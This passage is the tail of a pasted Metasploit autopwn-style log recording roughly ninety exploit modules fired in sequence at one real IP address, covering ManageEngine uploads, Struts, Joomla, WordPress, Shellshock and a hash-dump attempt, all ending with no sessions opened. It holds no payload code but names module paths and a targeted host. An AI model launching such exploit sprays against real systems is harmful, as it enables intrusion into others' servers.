  1249. [-] [2016.08.17-21:17:10] No bind payloads available for exploit/linux/http/centreon_sqli_exec)
  1250. [-] [2016.08.17-21:17:10] [0279] Exploit failed: A payload has not been selected.
  1251. [+] [2016.08.17-21:17:11] Workspace:Seocam Progress:284/337 (84%) [280/332] 166.62.27.177:80 - ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
  1252. [*] [2016.08.17-21:17:11] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1253. [*] [2016.08.17-21:17:11] Using a random high port (26918) for 166.62.27.177
  1254. [*] [2016.08.17-21:17:11] [0280] Started bind handler
  1255. [*] [2016.08.17-21:17:11] [0280] Selecting target, this might take a few seconds...
  1256. [-] [2016.08.17-21:17:13] [0280] Exploit aborted due to failure: no-target: 166.62.27.177:80 - Automatic targeting failed.
  1257. [+] [2016.08.17-21:17:13] Workspace:Seocam Progress:285/337 (84%) [281/332] 166.62.27.177:80 - Gitlist Unauthenticated Remote Command Execution
  1258. [-] [2016.08.17-21:17:13] No bind payloads available for exploit/linux/http/gitlist_exec)
  1259. [-] [2016.08.17-21:17:13] [0281] Exploit failed: A payload has not been selected.
  1260. [+] [2016.08.17-21:17:14] Workspace:Seocam Progress:286/337 (84%) [282/332] 166.62.27.177:80 - Numara / BMC Track-It! FileStorageService Arbitrary File Upload
  1261. [*] [2016.08.17-21:17:14] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1262. [*] [2016.08.17-21:17:14] Using a random high port (10933) for 166.62.27.177
  1263. [*] [2016.08.17-21:17:14] [0282] Started bind handler
  1264. [+] [2016.08.17-21:17:14] Workspace:Seocam Progress:287/337 (85%) [283/332] 166.62.27.177:80 - Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection
  1265. [*] [2016.08.17-21:17:14] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1266. [*] [2016.08.17-21:17:14] Using a random high port (59997) for 166.62.27.177
  1267. [*] [2016.08.17-21:17:15] [0283] Started bind handler
  1268. [*] [2016.08.17-21:17:17] [0283] 166.62.27.177:80 - Detected OS information:
  1269. [-] [2016.08.17-21:17:17] [0283] 166.62.27.177:80 - Exploit aborted due to failure: no-target: Unsupported target
  1270. [+] [2016.08.17-21:17:17] Workspace:Seocam Progress:288/337 (85%) [284/332] 166.62.27.177:80 - ManageEngine Desktop Central StatusUpdate Arbitrary File Upload
  1271. [*] [2016.08.17-21:17:17] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1272. [*] [2016.08.17-21:17:17] Using a random high port (9749) for 166.62.27.177
  1273. [*] [2016.08.17-21:17:17] [0284] Started bind handler
  1274. [*] [2016.08.17-21:17:18] [0284] Uploading JSP to execute the payload
  1275. [-] [2016.08.17-21:17:20] [0282] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (166.62.27.177:9010).
  1276. [+] [2016.08.17-21:17:20] Workspace:Seocam Progress:289/337 (85%) [285/332] 166.62.27.177:80 - VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution
  1277. [-] [2016.08.17-21:17:20] No bind payloads available for exploit/unix/http/vmturbo_vmtadmin_exec_noauth)
  1278. [-] [2016.08.17-21:17:20] [0273] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (166.62.27.177:80).
  1279. [-] [2016.08.17-21:17:20] [0285] Exploit failed: A payload has not been selected.
  1280. [+] [2016.08.17-21:17:21] Workspace:Seocam Progress:290/337 (86%) [286/332] 166.62.27.177:80 - ManageEngine Multiple Products Authenticated File Upload
  1281. [+] [2016.08.17-21:17:21] Workspace:Seocam Progress:291/337 (86%) [287/332] 166.62.27.177:80 - Wordpress SlideShow Gallery Authenticated File Upload
  1282. [*] [2016.08.17-21:17:21] Using a random high port (27418) for 166.62.27.177
  1283. [*] [2016.08.17-21:17:21] Using a random high port (16691) for 166.62.27.177
  1284. [*] [2016.08.17-21:17:21] [0286] Started bind handler
  1285. [+] [2016.08.17-21:17:21] Workspace:Seocam Progress:292/337 (86%) [288/332] 166.62.27.177:80 - Phpwiki Ploticus Remote Code Execution
  1286. [*] [2016.08.17-21:17:21] Using a random high port (62444) for 166.62.27.177
  1287. [*] [2016.08.17-21:17:22] [0288] Started bind handler
  1288. [*] [2016.08.17-21:17:22] [0286] Selecting target...
  1289. [*] [2016.08.17-21:17:23] [0286] Selected target ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1
  1290. [-] [2016.08.17-21:17:26] [0286] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Failed to authenticate
  1291. [+] [2016.08.17-21:17:26] Workspace:Seocam Progress:293/337 (86%) [289/332] 166.62.27.177:80 - ManageEngine OpManager and Social IT Arbitrary File Upload
  1292. [*] [2016.08.17-21:17:26] Using a random high port (54229) for 166.62.27.177
  1293. [*] [2016.08.17-21:17:26] [0289] Started bind handler
  1294. [*] [2016.08.17-21:17:26] [0289] Creating upload directories
  1295. [*] [2016.08.17-21:17:30] [0289] Uploading WAR file...
  1296. [-] [2016.08.17-21:17:30] [0289] Exploit aborted due to failure: unknown: 166.62.27.177:80 - WAR upload failed
  1297. [!] [2016.08.17-21:17:30] [0289] This exploit may require manual cleanup of 'state/archivedata/zip/Xbz02hmGG' on the target
  1298. [+] [2016.08.17-21:17:30] Workspace:Seocam Progress:294/337 (87%) [290/332] 166.62.27.177:80 - ManageEngine Eventlog Analyzer Arbitrary File Upload
  1299. [*] [2016.08.17-21:17:30] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1300. [*] [2016.08.17-21:17:31] Using a random high port (65190) for 166.62.27.177
  1301. [*] [2016.08.17-21:17:31] [0290] Started bind handler
  1302. [*] [2016.08.17-21:17:31] [0290] Determining target
  1303. [-] [2016.08.17-21:17:32] [0290] Unable to select a target, we must bail.
  1304. [-] [2016.08.17-21:17:38] [0284] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (166.62.27.177:80).
  1305. [+] [2016.08.17-21:17:39] Workspace:Seocam Progress:295/337 (87%) [291/332] 166.62.27.177:80 - Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
  1306. [*] [2016.08.17-21:17:39] Using a random high port (20221) for 166.62.27.177
  1307. [+] [2016.08.17-21:17:39] Workspace:Seocam Progress:296/337 (87%) [292/332] 166.62.27.177:80 - CUPS Filter Bash Environment Variable Code Injection (Shellshock)
  1308. [-] [2016.08.17-21:17:40] No bind payloads available for exploit/multi/http/cups_bash_env_exec)
  1309. [+] [2016.08.17-21:17:40] Workspace:Seocam Progress:297/337 (88%) [293/332] 166.62.27.177:80 - Advantech Switch Bash Environment Variable Code Injection (Shellshock)
  1310. [-] [2016.08.17-21:17:40] No bind payloads available for exploit/linux/http/advantech_switch_bash_env_exec)
  1311. [-] [2016.08.17-21:17:40] [0293] Exploit failed: A payload has not been selected.
  1312. [+] [2016.08.17-21:17:41] Workspace:Seocam Progress:298/337 (88%) [294/332] 166.62.27.177:80 - IPFire Bash Environment Variable Injection (Shellshock)
  1313. [-] [2016.08.17-21:17:41] No bind payloads available for exploit/linux/http/ipfire_bashbug_exec)
  1314. [-] [2016.08.17-21:17:41] [0294] Exploit failed: The following options failed to validate: CMD.
  1315. [+] [2016.08.17-21:17:41] Workspace:Seocam Progress:299/337 (88%) [295/332] 166.62.27.177:80 - Rejetto HttpFileServer Remote Command Execution
  1316. [*] [2016.08.17-21:17:41] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1317. [*] [2016.08.17-21:17:41] Using a random high port (18633) for 166.62.27.177
  1318. [-] [2016.08.17-21:17:41] Fatal: Could not select a callback port when bind connections are specified
  1319. [*] [2016.08.17-21:17:42] [0295] Started bind handler
  1320. [-] [2016.08.17-21:17:42] [0295] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
  1321. [+] [2016.08.17-21:17:42] Workspace:Seocam Progress:300/337 (89%) [296/332] 166.62.27.177:80 - Wordpress InfusionSoft Upload Vulnerability
  1322. [*] [2016.08.17-21:17:42] Using a random high port (45666) for 166.62.27.177
  1323. [*] [2016.08.17-21:17:42] [0296] Started bind handler
  1324. [-] [2016.08.17-21:17:42] [0288] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Upload failed
  1325. [+] [2016.08.17-21:17:43] Workspace:Seocam Progress:301/337 (89%) [297/332] 166.62.27.177:80 - Joomla Akeeba Kickstart Unserialize Remote Code Execution
  1326. [*] [2016.08.17-21:17:43] Using a random high port (26090) for 166.62.27.177
  1327. [-] [2016.08.17-21:17:43] Fatal: Could not select a callback port when bind connections are specified
  1328. [*] [2016.08.17-21:17:43] [0297] Started bind handler
  1329. [-] [2016.08.17-21:17:43] [0297] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
  1330. [+] [2016.08.17-21:17:43] Workspace:Seocam Progress:302/337 (89%) [298/332] 166.62.27.177:80 - TWiki Debugenableplugins Remote Code Execution
  1331. [-] [2016.08.17-21:17:43] No bind payloads available for exploit/unix/http/twiki_debug_plugins)
  1332. [-] [2016.08.17-21:17:43] [0298] Exploit failed: A payload has not been selected.
  1333. [+] [2016.08.17-21:17:44] Workspace:Seocam Progress:303/337 (89%) [299/332] 166.62.27.177:80 - Symantec Web Gateway 5 restore.php Post Authentication Command Injection
  1334. [-] [2016.08.17-21:17:44] No bind payloads available for exploit/linux/http/symantec_web_gateway_restore)
  1335. [+] [2016.08.17-21:17:44] Workspace:Seocam Progress:304/337 (90%) [300/332] 166.62.27.177:80 - Visual Mining NetCharts Server Remote Code Execution
  1336. [-] [2016.08.17-21:17:44] No bind payloads available for exploit/multi/http/visual_mining_netcharts_upload)
  1337. [-] [2016.08.17-21:17:44] [0300] Exploit failed: A payload has not been selected.
  1338. [+] [2016.08.17-21:17:44] Workspace:Seocam Progress:305/337 (90%) [301/332] 166.62.27.177:80 - Lexmark MarkVision Enterprise Arbitrary File Upload
  1339. [-] [2016.08.17-21:17:44] No bind payloads available for exploit/windows/http/lexmark_markvision_gfd_upload)
  1340. [-] [2016.08.17-21:17:45] [0301] Exploit failed: A payload has not been selected.
  1341. [+] [2016.08.17-21:17:45] Workspace:Seocam Progress:306/337 (90%) [302/332] 166.62.27.177:80 - Tuleap PHP Unserialize Code Execution
  1342. [*] [2016.08.17-21:17:45] Using a random high port (4838) for 166.62.27.177
  1343. [+] [2016.08.17-21:17:45] Workspace:Seocam Progress:307/337 (91%) [303/332] 166.62.27.177:80 - WordPress Photo Gallery Unrestricted File Upload
  1344. [*] [2016.08.17-21:17:45] Using a random high port (42572) for 166.62.27.177
  1345. [+] [2016.08.17-21:17:46] Workspace:Seocam Progress:308/337 (91%) [304/332] 166.62.27.177:80 - Novell ZENworks Configuration Management Arbitrary File Upload
  1346. [*] [2016.08.17-21:17:46] Using a random high port (6866) for 166.62.27.177
  1347. [*] [2016.08.17-21:17:46] [0304] Started bind handler
  1348. [*] [2016.08.17-21:17:46] [0304] Uploading WAR file to ../../../opt/novell/zenworks/share/tomcat/webapps/
  1349. [+] [2016.08.17-21:17:46] Workspace:Seocam Progress:309/337 (91%) [305/332] 166.62.27.177:80 - WordPress Holding Pattern Theme Arbitrary File Upload
  1350. [*] [2016.08.17-21:17:46] Using a random high port (26350) for 166.62.27.177
  1351. [*] [2016.08.17-21:17:46] [0305] Started bind handler
  1352. [*] [2016.08.17-21:17:46] [0305] Preparing payload...
  1353. [*] [2016.08.17-21:17:46] [0305] Uploading payload...
  1354. [-] [2016.08.17-21:17:47] [0304] Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=SSLv2/v3 read server hello A: unknown protocol
  1355. [-] [2016.08.17-21:17:47] [0305] Exploit aborted due to failure: unexpected-reply: Server responded with status code 404
  1356. [+] [2016.08.17-21:17:47] Workspace:Seocam Progress:310/337 (91%) [306/332] 166.62.27.177:80 - ElasticSearch Search Groovy Sandbox Bypass
  1357. [*] [2016.08.17-21:17:47] Using a random high port (47520) for 166.62.27.177
  1358. [*] [2016.08.17-21:17:47] [0306] Started bind handler
  1359. [*] [2016.08.17-21:17:47] [0306] Checking vulnerability...
  1360. [*] [2016.08.17-21:17:47] [0306] Trying to get a reference to java.lang.Runtime...
  1361. [+] [2016.08.17-21:17:48] Workspace:Seocam Progress:311/337 (92%) [307/332] 166.62.27.177:80 - Symantec Endpoint Protection Manager Authentication Bypass and Code Execution
  1362. [*] [2016.08.17-21:17:48] Using a random high port (33761) for 166.62.27.177
  1363. [*] [2016.08.17-21:17:48] [0307] Started bind handler
  1364. [*] [2016.08.17-21:17:48] [0307] Getting cookie...
  1365. [-] [2016.08.17-21:17:48] [0306] Target answered with HTTP code 404 (with a body)
  1366. [*] [2016.08.17-21:17:48] [0306] no response to test
  1367. [-] [2016.08.17-21:17:48] [0306] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Java has not been executed, aborting...
  1368. [+] [2016.08.17-21:17:48] Workspace:Seocam Progress:312/337 (92%) [308/332] 166.62.27.177:80 - Maarch LetterBox Unrestricted File Upload
  1369. [*] [2016.08.17-21:17:48] Using a random high port (7053) for 166.62.27.177
  1370. [*] [2016.08.17-21:17:49] [0308] Started bind handler
  1371. [*] [2016.08.17-21:17:49] [0308] Preparing payload...
  1372. [*] [2016.08.17-21:17:49] [0308] Uploading payload...
  1373. [-] [2016.08.17-21:17:49] [0307] Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=SSLv2/v3 read server hello A: unknown protocol
  1374. [+] [2016.08.17-21:17:49] Workspace:Seocam Progress:313/337 (92%) [309/332] 166.62.27.177:80 - PHPMoAdmin 1.1.2 Remote Code Execution
  1375. [*] [2016.08.17-21:17:49] Using a random high port (45075) for 166.62.27.177
  1376. [*] [2016.08.17-21:17:49] [0309] Started bind handler
  1377. [*] [2016.08.17-21:17:49] [0309] Executing payload...
  1378. [-] [2016.08.17-21:17:49] [0308] Exploit aborted due to failure: unexpected-reply: Server responded with status code 404
  1379. [+] [2016.08.17-21:17:50] Workspace:Seocam Progress:314/337 (93%) [310/332] 166.62.27.177:80 - Accellion FTA getStatus verify_oauth_token Command Execution
  1380. [-] [2016.08.17-21:17:50] No bind payloads available for exploit/linux/http/accellion_fta_getstatus_oauth)
  1381. [-] [2016.08.17-21:17:50] [0310] Exploit failed: A payload has not been selected.
  1382. [+] [2016.08.17-21:17:50] Workspace:Seocam Progress:315/337 (93%) [311/332] 166.62.27.177:80 - SysAid Help Desk Administrator Portal Arbitrary File Upload
  1383. [*] [2016.08.17-21:17:50] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1384. [*] [2016.08.17-21:17:50] Using a random high port (14779) for 166.62.27.177
  1385. [+] [2016.08.17-21:17:51] Workspace:Seocam Progress:316/337 (93%) [312/332] 166.62.27.177:80 - SysAid Help Desk 'rdslogs' Arbitrary File Upload
  1386. [*] [2016.08.17-21:17:51] Using a random high port (9382) for 166.62.27.177
  1387. [*] [2016.08.17-21:17:51] [0312] Started bind handler
  1388. [*] [2016.08.17-21:17:51] [0312] Creating upload directory
  1389. [*] [2016.08.17-21:17:52] [0312] Uploading WAR file...
  1390. [-] [2016.08.17-21:17:52] [0312] Exploit aborted due to failure: unknown: 166.62.27.177:80 - WAR upload failed
  1391. [+] [2016.08.17-21:17:53] Workspace:Seocam Progress:317/337 (94%) [313/332] 166.62.27.177:80 - Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution
  1392. [-] [2016.08.17-21:17:53] No bind payloads available for exploit/multi/http/rails_web_console_v2_code_exec)
  1393. [-] [2016.08.17-21:17:53] [0313] Exploit failed: A payload has not been selected.
  1394. [+] [2016.08.17-21:17:53] Workspace:Seocam Progress:318/337 (94%) [314/332] 166.62.27.177:80 - ProFTPD 1.3.5 Mod_Copy Command Execution
  1395. [-] [2016.08.17-21:17:53] No bind payloads available for exploit/unix/ftp/proftpd_modcopy_exec)
  1396. [-] [2016.08.17-21:17:53] [0314] 166.62.27.177:80 - Exploit failed: A payload has not been selected.
  1397. [+] [2016.08.17-21:17:54] Workspace:Seocam Progress:319/337 (94%) [315/332] 166.62.27.177:80 - F5 iControl iCall::Script Root Command Execution
  1398. [-] [2016.08.17-21:17:54] No bind payloads available for exploit/linux/http/f5_icall_cmd)
  1399. [-] [2016.08.17-21:17:54] [0315] Exploit failed: A payload has not been selected.
  1400. [+] [2016.08.17-21:17:54] Workspace:Seocam Progress:320/337 (94%) [316/332] 166.62.27.177:80 - Atlassian HipChat for Jira Plugin Velocity Template Injection
  1401. [*] [2016.08.17-21:17:54] Using a random high port (49077) for 166.62.27.177
  1402. [*] [2016.08.17-21:17:55] [0316] Started bind handler
  1403. [-] [2016.08.17-21:17:55] [0316] 166.62.27.177:80 - Exploit aborted due to failure: bad-config: Jira username and password are required.
  1404. [+] [2016.08.17-21:17:55] Workspace:Seocam Progress:321/337 (95%) [317/332] 166.62.27.177:80 - Kaseya VSA uploader.aspx Arbitrary File Upload
  1405. [*] [2016.08.17-21:17:55] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1406. [*] [2016.08.17-21:17:55] Using a random high port (26656) for 166.62.27.177
  1407. [*] [2016.08.17-21:17:56] [0317] Started bind handler
  1408. [-] [2016.08.17-21:17:56] [0317] Exploit aborted due to failure: no-access: 166.62.27.177:80 - Failed to create a valid session
  1409. [+] [2016.08.17-21:17:57] Workspace:Seocam Progress:322/337 (95%) [318/332] 166.62.27.177:80 - vBulletin 5.1.2 Unserialize Code Execution
  1410. [*] [2016.08.17-21:17:57] Using a random high port (64823) for 166.62.27.177
  1411. [*] [2016.08.17-21:17:57] [0318] Started bind handler
  1412. [*] [2016.08.17-21:17:57] [0318] Trying to inferprint the instance...
  1413. [-] [2016.08.17-21:17:58] [0318] Exploit aborted due to failure: no-target: 166.62.27.177:80 - Failed to detect a vulnerable instance
  1414. [+] [2016.08.17-21:17:58] Workspace:Seocam Progress:323/337 (95%) [319/332] 166.62.27.177:80 - Joomla Content History SQLi Remote Code Execution
  1415. [*] [2016.08.17-21:17:58] Using a random high port (40571) for 166.62.27.177
  1416. [*] [2016.08.17-21:17:58] [0319] Started bind handler
  1417. [-] [2016.08.17-21:17:59] [0319] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Error retrieving table prefix
  1418. [+] [2016.08.17-21:17:59] Workspace:Seocam Progress:324/337 (96%) [320/332] 166.62.27.177:80 - ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability
  1419. [*] [2016.08.17-21:17:59] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1420. [*] [2016.08.17-21:17:59] Using a random high port (5549) for 166.62.27.177
  1421. [*] [2016.08.17-21:18:00] [0320] Started bind handler
  1422. [*] [2016.08.17-21:18:00] [0320] Creating JSP stager
  1423. [*] [2016.08.17-21:18:02] [0320] Uploading JSP stager ItizN.jsp...
  1424. [-] [2016.08.17-21:18:03] [0296] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (166.62.27.177:80).
  1425. [-] [2016.08.17-21:18:03] [0320] Exploit aborted due to failure: unknown: The server returned 404, but 200 was expected.
  1426. [!] [2016.08.17-21:18:03] [0320] This exploit may require manual cleanup of '../webapps/DesktopCentral/jspf/ItizN.jsp' on the target
  1427. [+] [2016.08.17-21:18:03] Workspace:Seocam Progress:325/337 (96%) [321/332] 166.62.27.177:80 - Joomla HTTP Header Unauthenticated Remote Code Execution
  1428. [*] [2016.08.17-21:18:04] Using a random high port (43136) for 166.62.27.177
  1429. [*] [2016.08.17-21:18:04] [0321] Started bind handler
  1430. [+] [2016.08.17-21:18:04] Workspace:Seocam Progress:326/337 (96%) [322/332] 166.62.27.177:80 - Oracle ATS Arbitrary File Upload
  1431. [-] [2016.08.17-21:18:04] No bind payloads available for exploit/multi/http/oracle_ats_file_upload)
  1432. [-] [2016.08.17-21:18:04] [0322] Exploit failed: A payload has not been selected.
  1433. [-] [2016.08.17-21:18:04] [0321] 166.62.27.177:80 - Unable to determine the PHP version.
  1434. [*] [2016.08.17-21:18:04] [0321] 166.62.27.177:80 - Sending payload ...
  1435. [+] [2016.08.17-21:18:04] Workspace:Seocam Progress:327/337 (97%) [323/332] 166.62.27.177:80 - Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload
  1436. [*] [2016.08.17-21:18:04] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1437. [*] [2016.08.17-21:18:05] Using a random high port (18008) for 166.62.27.177
  1438. [*] [2016.08.17-21:18:05] [0323] Started bind handler
  1439. [*] [2016.08.17-21:18:06] [0323] 166.62.27.177:80 - Target is not vulnerable.
  1440. [+] [2016.08.17-21:18:13] Workspace:Seocam Progress:328/337 (97%) [324/332] 166.62.27.177:80 - WordPress Ninja Forms Unauthenticated File Upload
  1441. [*] [2016.08.17-21:18:13] Using a random high port (2125) for 166.62.27.177
  1442. [+] [2016.08.17-21:18:13] Workspace:Seocam Progress:329/337 (97%) [325/332] 166.62.27.177:80 - NETGEAR ProSafe Network Management System 300 Arbitrary File Upload
  1443. [*] [2016.08.17-21:18:13] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1444. [*] [2016.08.17-21:18:14] Using a random high port (53633) for 166.62.27.177
  1445. [*] [2016.08.17-21:18:14] [0325] Started bind handler
  1446. [*] [2016.08.17-21:18:16] [0325] 166.62.27.177:80 - Uploading payload...
  1447. [-] [2016.08.17-21:18:17] [0325] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Payload upload failed
  1448. [+] [2016.08.17-21:18:17] Workspace:Seocam Progress:330/337 (97%) [326/332] 166.62.27.177:80 - Novell ServiceDesk Authenticated File Upload
  1449. [*] [2016.08.17-21:18:17] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1450. [*] [2016.08.17-21:18:17] Using a random high port (33613) for 166.62.27.177
  1451. [*] [2016.08.17-21:18:18] [0326] Started bind handler
  1452. [-] [2016.08.17-21:18:20] [0326] Exploit aborted due to failure: no-access: 166.62.27.177:80 - Failed to get the login URL.
  1453. [+] [2016.08.17-21:18:20] Workspace:Seocam Progress:331/337 (98%) [327/332] 166.62.27.177:80 - Ruby on Rails ActionPack Inline ERB Code Execution
  1454. [-] [2016.08.17-21:18:20] No bind payloads available for exploit/multi/http/rails_actionpack_inline_exec)
  1455. [-] [2016.08.17-21:18:20] [0327] Exploit failed: A payload has not been selected.
  1456. [+] [2016.08.17-21:18:20] Workspace:Seocam Progress:332/337 (98%) [328/332] 166.62.27.177:80 - ATutor 2.2.1 SQL Injection / Remote Code Execution
  1457. [*] [2016.08.17-21:18:20] Using a random high port (26418) for 166.62.27.177
  1458. [*] [2016.08.17-21:18:20] [0328] Started bind handler
  1459. [*] [2016.08.17-21:18:20] [0328] 166.62.27.177:80 - Dumping the username and password hash...
  1460. [-] [2016.08.17-21:18:26] [0321] 166.62.27.177:80 - Exploit aborted due to failure: unknown: No response
  1461. [+] [2016.08.17-21:18:26] Workspace:Seocam Progress:333/337 (98%) [329/332] 166.62.27.177:80 - Apache Struts Dynamic Method Invocation Remote Code Execution
  1462. [*] [2016.08.17-21:18:26] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1463. [*] [2016.08.17-21:18:26] Using a random high port (39902) for 166.62.27.177
  1464. [*] [2016.08.17-21:18:26] [0329] Started bind handler
  1465. [*] [2016.08.17-21:18:27] [0329] 166.62.27.177:80 - Uploading exploit to HJkB5S.jar, and executing it.
  1466. [+] [2016.08.17-21:18:28] [0328] 166.62.27.177:80 - Got the 's hash: !
  1467. [-] [2016.08.17-21:18:28] [0328] 166.62.27.177:80 - Exploit failed: TypeError no implicit conversion of nil into String
  1468. [-] [2016.08.17-21:18:29] [0329] Exploit aborted due to failure: bad-config: Server returned HTTP 404, please double check TARGETURI
  1469. [+] [2016.08.17-21:18:29] Workspace:Seocam Progress:334/337 (99%) [330/332] 166.62.27.177:80 - Apache Struts Dynamic Method Invocation Remote Code Execution
  1470. [!] [2016.08.17-21:18:29] [0330] ******************************************************************************************
  1471. [!] [2016.08.17-21:18:29] [0330] * The module linux/http/struts_dmi_exec is deprecated! *
  1472. [!] [2016.08.17-21:18:29] [0330] * It will be removed on or about 2016-06-01 *
  1473. [!] [2016.08.17-21:18:29] [0330] * Use exploit/multi/http/struts_dmi_exec instead *
  1474. [!] [2016.08.17-21:18:29] [0330] ******************************************************************************************
  1475. [*] [2016.08.17-21:18:29] Using a random high port (60866) for 166.62.27.177
  1476. [!] [2016.08.17-21:18:29] [0330] ******************************************************************************************
  1477. [!] [2016.08.17-21:18:29] [0330] * The module linux/http/struts_dmi_exec is deprecated! *
  1478. [!] [2016.08.17-21:18:29] [0330] * It will be removed on or about 2016-06-01 *
  1479. [!] [2016.08.17-21:18:29] [0330] * Use exploit/multi/http/struts_dmi_exec instead *
  1480. [!] [2016.08.17-21:18:29] [0330] ******************************************************************************************
  1481. [*] [2016.08.17-21:18:29] [0330] Started bind handler
  1482. [*] [2016.08.17-21:18:29] [0330] 166.62.27.177:80 - Uploading exploit to /tmp/9Inf
  1483. [+] [2016.08.17-21:18:29] Workspace:Seocam Progress:335/337 (99%) [331/332] 166.62.27.177:80 - Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution
  1484. [*] [2016.08.17-21:18:29] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1485. [*] [2016.08.17-21:18:29] Using a random high port (24105) for 166.62.27.177
  1486. [*] [2016.08.17-21:18:29] [0331] Started bind handler
  1487. [*] [2016.08.17-21:18:29] [0331] 166.62.27.177:80 - Uploading exploit to WNma.jar, and executing it.
  1488. [-] [2016.08.17-21:18:30] [0330] Exploit aborted due to failure: bad-config: Server returned HTTP 404, please double check TARGETURI
  1489. [-] [2016.08.17-21:18:30] [0331] Exploit aborted due to failure: bad-config: Server returned HTTP 404, please double check TARGETURI
  1490. [+] [2016.08.17-21:18:30] Workspace:Seocam Progress:336/337 (99%) [332/332] 166.62.27.177:80 - Magento 2.0.6 Unserialize Remote Code Execution
  1491. [*] [2016.08.17-21:18:30] Using a random high port (17839) for 166.62.27.177
  1492. [*] [2016.08.17-21:18:30] [0332] Started bind handler
  1493. [!] [2016.08.17-21:18:35] [0332] This exploit may require manual cleanup of '9hf5dh0DZqf8QTLnscHfiWmTtB.php' on the target
  1494. [+] [2016.08.17-21:23:06] Workspace:Seocam Progress:337/337 (100%) Complete (0 sessions opened, 1 host targeted, 0 hosts skipped)
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!